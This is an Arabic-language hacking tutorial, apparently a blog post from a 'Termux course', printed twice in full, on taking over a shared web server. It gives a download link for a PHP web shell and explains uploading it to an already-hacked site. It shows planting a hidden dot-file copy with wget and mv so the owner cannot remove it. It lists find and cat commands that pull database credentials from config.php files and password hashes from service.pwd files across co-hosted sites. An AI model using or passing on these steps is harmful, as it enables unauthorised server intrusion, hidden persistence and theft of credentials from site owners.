السلام عليكم ورحمه الله وبركاته معكم الجنرال عمر في شرح جديد وهو ازاي تخترق السيرفر من خلال برنامج ترميكس
#2
طريقة اختراق السيرفرات #شرح_حصري_من_الجنرال_للمعلوميات_تك
لنفترض انك اخترقت موقع بأي ثغره .. او عندك انت موقع لك عند اي سيرفر
وبدك تخترق السيرفر طريقة اختراق السيرفر
اولآ بتحميل سكربت الشيل بلغة php على جهازك
وهي وصلة الشيل
http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
ال php شيل ((phpshell )) هو سكربت بلغة (( php ))
وبتقدر من خلالو تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع يلي على السيرفر وايضا رؤية ملف الــ config
يلي على السيرفر
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..
بعد التحميل بتقدر تخترق السيرفر بشكل كامل ..
مثال ..👇
نفترض انك اخترقت هذا الموقع
http://www.Anonymous.com/
وقمت بتحميل الــ phpshell
على ملف download
رح يصير العنوان بهدا الشكل
www.Anonymous.com/download/phpshell.php
وبعدين اذا دخلنا الى العنوان رح تشوف كلمة اسمها Command وامامها فراغ
في الفراغ هذا رح نحط فيه اوامر اللينكس..
بس قبل البدء في الشرح الجديد.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع يلي اخترقتو الشيل.. يروح ويحذفه الك
ولاكن لو تسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفائه نسوي هيك بهي الطريقة www.Anonymous.com/download/phpshell.php wget
وبعدين نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ اضفنا نقطة . واذا حذف الاول راح يكون معانا الثاني ومخفي
---------------------------------------------
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.Anonymous.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
ونحط الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ ((safe mode))
شرح الاوامر --==--
هلئ رح اعلمكم طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
find / -name config.php
راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع يلي على السيرفر بالعادة بتكوين كثيرة وانا بالعادة يخرج لي 300و 250 موقع ))
المواقع رح تكون باللون الزهري
طيب بدنا نقرأ الي مكتوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
المهم نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdo/اسم الملف/config.php
بعدين راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح اضرب المنتدى وبعدين ملف الــ admin ودخل اليوزر والباسورد لقاعدة البيانات
او الدخول عن طريق برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الأن خلصنا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd
وراح يطلع المواقع بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب هلق شوف الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
او نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_ht
بعدها بصير السيرفر والمواقع يلي على السيرفر تحت سيطرتك وتقدر تعمل فيهم يلي بدك ياه
كان معكم #الجنرال_للملعوميات_تك في #دورة_الترميكس
#2
طريقة اختراق السيرفرات #شرح_حصري_من_الجنرال_للمعلوميات_تك
لنفترض انك اخترقت موقع بأي ثغره .. او عندك انت موقع لك عند اي سيرفر
وبدك تخترق السيرفر طريقة اختراق السيرفر
اولآ بتحميل سكربت الشيل بلغة php على جهازك
وهي وصلة الشيل
http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
ال php شيل ((phpshell )) هو سكربت بلغة (( php ))
وبتقدر من خلالو تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع يلي على السيرفر وايضا رؤية ملف الــ config
يلي على السيرفر
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..
بعد التحميل بتقدر تخترق السيرفر بشكل كامل ..
مثال ..👇
نفترض انك اخترقت هذا الموقع
http://www.Anonymous.com/
وقمت بتحميل الــ phpshell
على ملف download
رح يصير العنوان بهدا الشكل
www.Anonymous.com/download/phpshell.php
وبعدين اذا دخلنا الى العنوان رح تشوف كلمة اسمها Command وامامها فراغ
في الفراغ هذا رح نحط فيه اوامر اللينكس..
بس قبل البدء في الشرح الجديد.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع يلي اخترقتو الشيل.. يروح ويحذفه الك
ولاكن لو تسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفائه نسوي هيك بهي الطريقة www.Anonymous.com/download/phpshell.php wget
وبعدين نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ اضفنا نقطة . واذا حذف الاول راح يكون معانا الثاني ومخفي
---------------------------------------------
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.Anonymous.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
ونحط الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ ((safe mode))
شرح الاوامر --==--
هلئ رح اعلمكم طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
find / -name config.php
راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع يلي على السيرفر بالعادة بتكوين كثيرة وانا بالعادة يخرج لي 300و 250 موقع ))
المواقع رح تكون باللون الزهري
طيب بدنا نقرأ الي مكتوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
المهم نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdo/اسم الملف/config.php
بعدين راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح اضرب المنتدى وبعدين ملف الــ admin ودخل اليوزر والباسورد لقاعدة البيانات
او الدخول عن طريق برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الأن خلصنا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd
وراح يطلع المواقع بالشكل هذا
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب هلق شوف الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
او نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_ht
بعدها بصير السيرفر والمواقع يلي على السيرفر تحت سيطرتك وتقدر تعمل فيهم يلي بدك ياه
كان معكم #الجنرال_للملعوميات_تك في #دورة_الترميكس
إرسال تعليق